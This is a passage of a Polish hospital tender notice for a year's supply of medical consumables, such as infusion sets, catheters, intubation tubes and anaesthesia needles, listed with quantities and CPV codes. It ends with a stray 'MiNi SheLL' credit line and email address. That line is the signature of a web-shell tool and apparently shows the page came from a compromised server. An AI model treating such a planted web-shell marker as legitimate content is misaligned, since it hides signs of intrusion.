2. Zamawiający dopuszcza także w szczególnych sytuacjach i za jego pisemną zgodą w trakcie trwania umowy zmianę przedmiotu umowy dostarczanego przez Wykonawcę, w szczególności w sytuacji gdy zaprzestano lub zawieszono produkcję danego towaru objętego umową, na inny towar o parametrach nie gorszych niż opisane w SIWZ, przy czym cena tego towaru zamiennego nie może przekraczać ceny towaru, na który została podpisana umowa. W przypadku 
zaprzestania lub zawieszenia produkcji towaru objętego umową Wykonawca winien udokumentować ten fakt. 
3. Wszelkie zmiany umowy wymagają formy pisemnej pod rygorem ich nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.szpital.wloclawek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Szpital Specjalistyczny we Włocławku im. błogosławionego ks. Jerzego Popiełuszki,  ul. Wieniecka 49, 87-800 Włocławek  (budynek  administracji, pokój 303).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.08.2013 godzina 10:00, miejsce: Wojewódzki Szpital Specjalistyczny we Włocławku im. błogosławionego ks. Jerzego Popiełuszki,  ul. Wieniecka 49, 87-800 Włocławek  (budynek  administracji, pokój 303).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1 Aparaty do przetaczania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> l.p.	Opis przedmiotu zamówienia	 rozmiar	j.m.	ilość  na 1 rok
1.	Aparaty do infuzji 
	- dł. komory kroplowej 4,5-7 cm
- dren o d. 140-160 cm. 
- op. zbiorcze max. do 400 szt.	szt.
	193000
2.	Aparaty do infuzji bursztynowe
- do przetaczania leków światłoczułych		szt.	400
3.	Strzykawka bursztynowa 50 ml		szt	900
4.	Aparat do transfuzji
	- dł. komory kroplowej 7-10 cm
- dren o d. 140-160 cm
- op. zbiorcze max. do 400 szt.	szt.
	16800

5.	Przedłużacze do pomp infuzyjnych
	- dł. drenu 150 cm
- op. zbiorcze max. do 100 szt.	szt. 	7800
6.	Przedłużacze do pomp infuzyjnych bursztynowe		szt.	300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.41.00-7, 33.19.41.20-3, 33.19.42.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2 Cewniki, pojemniki na mocz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> l.p.	Opis przedmiotu zamówienia	rozmiar	j.m.	ilość  na 1 rok
1	Cewnik Foleya dwudrożny
	10 ch/ dł  28cm	szt.	120
		12 ch / dł 40cm	szt.	240
		14 ch / dł 40cm	szt.	360
		16 ch / dł 40cm	szt.	3000
		18 ch / dł 40cm	szt.	4200
		20 ch / dł 40cm	szt.	1200
2	Worki do moczu	2 litrowe	szt.	30000
3	Wieszaki przyłóżkowe do worków moczowych		szt.	700
4	Woreczki do moczu dla noworodków i niemowląt,  dla chłopców 	ok. 100 ml	szt.
	1200
5	Woreczki do moczu dla noworodków i niemowląt, dla dziewczynek,	ok. 100 ml	szt.
	1200
6	Cewnik do odsysania górnych dróg oddechowych
	6 ch	szt.	2400
		8 ch	szt.	2400
		10 ch	szt.	2400
		12 ch	szt.	7200
		14 ch	szt.	21600
		16 ch	szt.	18000
		18 ch	szt.	6000
7	Cewnik do odsysania z lewego oskrzela 	14 ch dł. 60 cm	szt.	3000
8	Cewnik do podawania tlenu przez nos, tzw. nosek
	dł. 140 -150 cm	szt.	4200
		dł. min. 200 cm	szt.	1500
9	Zgłębnik żołądkowo-dwunastniczy 
	16 ch - 5,3 mm	szt.	600
		18 ch - 6.0 mm	szt.	600
		20 Ch- 6,7 mm	szt.	300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2, 33.14.16.15-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3 Drobny sprzęt  medyczny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> l.p.	Opis przedmiotu zamówienia	rozmiar	j.m.	ilość  na 1 rok
1	Pojemnik z łopatką (do pobierania próbek kału) 
	20 ml	szt.

op.	13200

132
2	Kieliszki do leków wielorazowe 		szt.	1800
3	Kieliszki do leków jednorazowe		szt.	3600
4	Szpatułka drewniana 		op.	150
5	Pojemniki na zużyte igły 	200 ml	szt.	3000
6	Pojemniki na zużyte wenflony	1000 ml	szt.	6000
7	Pojemnik na odpady medyczne	700 ml	szt.	720
8	Zaciskacz do pępowiny 		szt.	1500
9	Opaski identyfikacyjne dla noworodków 
		szt.3000
op.	60
10	Opaski identyfikacyjne dla dorosłych 
		szt.36000
op.	720.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 31.33.14.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie 4 Bielizna i odzież jednorazowego użytku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> l.p.	Opis przedmiotu zamówienia	rozmiar	j.m.	ilość na 1 rok
1	Maski chirurgiczne 3 warstwowe z noskiem		szt.	32400
2	Czepki pielęgniarskie 		szt.	16800
3	Czepki chirurgiczne 		szt.	9600
4	Fartuchy chirurgiczne 		szt.	6720
5	Fartuch przedni z folii		szt.	6000
6	Fartuchy higieniczne dla pacjentów	L	szt.	3600
		XL	szt.	3600
7	Prześcieradła włókninowe 
 - długość i grubość min. 45g/m2 210x130 cm lub większe		szt.	24000
8	Ochraniacze na obuwie		szt.	6000
9	Pościel z fizeliny zielona, jednorazowa (poszwa, poszewka, prześcieradło)		kpl	700.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie 5  Pieluchomajtki, pokrycia higieniczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> l.p.	Opis przedmiotu zamówienia	rozmiar	j.m.	ilość na 1 rok
1	Pieluchomajtki noworodkowe	2-5kg	szt.	4800
2	Pieluchomajtki dziecięce
	5-10kg	szt.	720
		8-12kg	szt.	720
		12-25kg	szt.	1080
3	Pieluchomajtki dla dorosłych
	L	szt.	32400
		XL	szt.	3600
4	Pokrycia higieniczne  w rolce	ok. 50cm x 40 cm	rolki  po 50 m	300
		ok. 60 cm x 50 cm	rolki po 50 m	184.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie 6 Podkłady higieniczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> l.p.	Opis przedmiotu zamówienia	rozmiar	j.m.	ilość  na 1 rok
1	Podkład higieniczny
	40x60 cm	szt.	4800
		60x90cm	szt.	14400
2	Podkład higieniczny	80-210cm	szt.	4800
3	Wkłady anatomiczne dla kobiet
	Midi ok. 15 x 33	szt.	16800
		Maxi ok. 20 x 45	szt.	6000
4	Pieluchy anatomiczne	ok. 31 x 62	szt.	3600.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie 7 Elektrody EKG, papier do badań.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> l.p.	Opis przedmiotu zamówienia	rozmiar	j.m.	ilość  na 1 rok
1	Elektrody do EKG piankowe z żelem stałym przeznaczone do  monitorowania  noworodków 	średnica 30mm	szt.
	2400
2	Elektrody do EKG piankowe z żelem stałym  dla dorosłych		szt.
	102000
3	Elektrody do EKG bezcieniowe dla dorosłych, 		szt.
	1320
4	Papier do badań EKG	AsCard A4 - 112x25 ASPEL S	rolki	1440
		Do aparatu GQW 110.2.140	bl.	600
		Life Pack 107,75 x 23	szt.	210
5	Papier USG	UPP - 110 HD 
rolki 110mm x 20m	rolki	250
6	Ręcznik celulozowo-włókninowy bezopyłowy - zalecenia producenta aparatu do USG wys. 23-25 cm, 130m, ok. 300 odc. Waga 2-2,5 kg		rolki	72
7	Papier do KTG	Do aparatu OXFORD SANICAID 143x150x300	bl.	100
		Do aparatu typu SRF 61B++ firmy OXFORD	bl.	30
		Do aparatu monitor COROMETRICS seria 17 firmy OXFORD	bl.	60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.19.80.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie 8   Filtry antybakteryjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> l.p.	Opis przedmiotu zamówienia	rozmiar	j.m.	ilość  na 1 rok
1	Filtr antybakteryjny, antywirusowy do respiratorów		szt.	50
2	Filtr antybakteryjny , antywirusowy do zabiegów operacyjnych	Dla dorosłych	szt	7410
3	Filtr antybakteryjny , antywirusowy do zabiegów operacyjnych	Dla dzieci	szt	600

4	Wymiennik ciepła i wilgoci do rurek tracheotomijnych		szt.	1200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.11.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadanie 9 Rurki intubacyjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> l.p.	Opis przedmiotu zamówienia	rozmiar	j.m.	ilość  na 1 rok
1	Rurki intubacyjne bez mankietu uszczelniającego
	2,0 mm (wew.)	szt.	30
		2,5 mm (wew.)	szt.	30
		3,0 mm (wew.)	szt.	30
		4,0 mm (wew.)	szt.	40
		5,0 mm (wew.)	szt.	110
		5,5 mm (wew.)	szt.	40
		6,0 mm (wew.)	szt.	20
2	Rurki intubacyjne z mankietem uszczelniającym
 	3,0 mm (wew.)	szt.	20
		4,0 mm (wew.)	szt.	110
		4,5 mm (wew.)	szt.	20
		5,0 mm (wew.)	szt.	180
		5,5 mm (wew.)	szt.	150
		6,0 mm (wew.)	szt.	500
		7,0 mm (wew.)	szt.	450
		7,5 mm (wew.)	szt.	10
		8,0 mm (wew.)	szt.	1032
		9,0 mm (wew.)	szt.	1023
3	Rurki intubacyjne zbrojone z mankietem uszczelniającym
	6,0 mm (wew.)	szt.	20
		7,0 mm (wew.)	szt.	6
		8,0 mm (wew.)	szt.	374
		9,0 mm (wew.)	szt.	400
4	Rurki intubacyjne z mankietem uszczelniającym do intubacji przez nos tzw. rurka donosowa
	6,0 mm	szt.	30
		7,0 mm	szt.	30
5	Rurki intubacyjne z mankietem uszczelniającym z odsysaniem z nad mankietu	8,0 mm	szt.	30
		9,0 mm	szt.	30
6	Rurki intubacyjne z mankietem uszczelniającym do przedłużonej  intubacji z odsysaniem znad mankietu	8,0 mm	szt.	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.11.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zadanie 10 Rurka intubacyjna do terapii  surfaktantem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> l.p.	Opis przedmiotu zamówienia	rozmiar	j.m.	ilość na 1 rok
1	Rurki intubacyjne bez mankietu uszczelniającego do terapii surfaktantem 
	2,0 mm (wew.)	szt.	10
		2,5 mm (wew.)	szt.	20
		3,0 mm (wew.)	szt.	25
		3,5 mm (wew.)	szt.	20
		4,0 mm (wew.)	szt.	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.11.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zadanie 11 Rurki tracheostomijne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> l.p.	Opis przedmiotu zamówienia	rozmiar	j.m.	ilość na 1 rok
1	Rurka tracheostomijna z mankietem uszczelniającym
	6,0 mm (wew.)	szt.	10
		7,0 mm (wew.)	szt.	12
		8,0 mm (wew.)	szt.	30
		9,0 mm (wew.)	szt.	10
		10,0 mm (wew.)	szt.	12
2	Rurka tracheostomijna z mankietem uszczelniającym z odsysaniem z nad mankietu
	5,0mm (wew.)	szt.	2
		6,0 mm (wew.)	szt.	2
		7,0 mm (wew.)	szt.	10
		8,0 mm (wew.)	szt.	100
		9,0 mm (wew.)	szt.	100
		10,0 mm (wew.)	szt.	40
3	Rurka tracheotomijna z mankietem uszczelniającym z możliwością regulacji głębokości rurki
	7,0 mm (wew.)	szt.	10
		8,0 mm (wew.)	szt.	20
		9,0 mm (wew.)	szt.	20
		10,0 mm (wew.)	szt.	10
4	Rurka tracheotomijna foniatryczna z mankietem uszczelniającym	8,0 mm (wew.)	szt.	10
		9,0 mm (wew.)	szt.	10
5	Rurka ustno-gardłowa
	0/5 cm	szt.	15
		2/7 cm	szt.	15
		3/8 cm	szt.	275
		4/9 cm	szt.	385
		5/10 cm	szt.	275
6	Prowadnica intubacyjna do ukształtowania drutem
	2 dł. 225 mm	szt.	10
		4 dł. 335 mm	szt.	40
		5 dł. 365 mm	szt.	40
7	Maska krtaniowa z mankietem uszczelniającym
	2,5 dla 20-30 kg	szt.	4
		3 dla 30-50 kg	szt.	35
		4 dla 57-70 kg	szt.	33
		5 powyżej 70 kg	szt.	32
8	Rurka krtaniowa LT-D 
	nr 2 dzieci 12-25 kg	szt.	

120
		nr 2.5 dzieci 125-150cm	szt.	
		nr 3 dorośli <155 cm	szt.	
		nr 4 dorośli 155-180 cm	szt.	
		nr 5 dorośli >180 cm	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.11.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Zadanie 12 Rurka tracheotomijna z polietylenu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> l.p.	Opis przedmiotu zamówienia	rozmiar	j.m.	ilość na 1 rok
1	Rurka tracheotomijna z polietylenu z otworem / bez otworu
	6,0 mm (wew.)	szt.	5
		7,0 mm (wew.)	szt.	48
		8,0 mm (wew.)	szt.	72
		9,0 mm (wew.)	szt.	17
		10,0 mm (wew.)	szt.	8.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.11.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Zadanie 13 Igły do znieczuleń.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> l.p.	Opis przedmiotu zamówienia	rozmiar	j.m.	ilość na 1 rok 
1	Igły do znieczuleń podpajęczynówkowych z mandrynem i końcówką standard
	22G 
 dł. 120mm	szt.
	

50
		25G lub 26G
dł.  120mm-130mm	szt.	
		25G 
dł.  88mm-90mm	szt.	50
2	Igły do znieczuleń podpajęczynówkowych ze szlifem  typu Pensil Point pakowana razem z prowadnicą
	27G - dł. ok. 88mm-90mm ze szlifem typu Pencan	szt.	1800
		26G - dł. ok.88mm-90mm ze szlifem typu Pensil point	szt.	800
3	Igła Tuohy do znieczuleń zewnątrzoponowych	18G - dł. ok.88mm-90mm	szt.	20
4	Zestaw do wkłuć centralnych z jednoświatłowym cewnikiem	14G -dł 20cm	szt.	100
		16G - dł 20cm	szt.	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.21-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Zadanie 14 Zestawy do kaniulacji centralnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> l.p.	Opis przedmiotu zamówienia	rozmiar	j.m.	ilość  na 1 rok
1	Zestaw do kaniulacji żył centralnych z antybakteryjnym dwuświatłowym cewnikiem
	7F - dł. 16cm	szt.	30
		7F - dł. 20cm	szt.	30
2	Zestaw do kaniulacji żył centralnych z antybakteryjnym trzyświatłowym cewnikiem	7F dł. 20cm	szt.	30
3	Zestaw do hemofiltracji z dwukanałowym cenikiem silikonowym
 	13,5F - dł. 15cm	szt.	20
		13,5F - dł. 20cm	szt.	30
		13,5F dł. 24cm	szt.	30
4	Zestaw do kaniulacji żył centralnych do hemodializy z cewnikiem trzyświatłowym	12F dł. 20cm	szt.	15.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.20-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com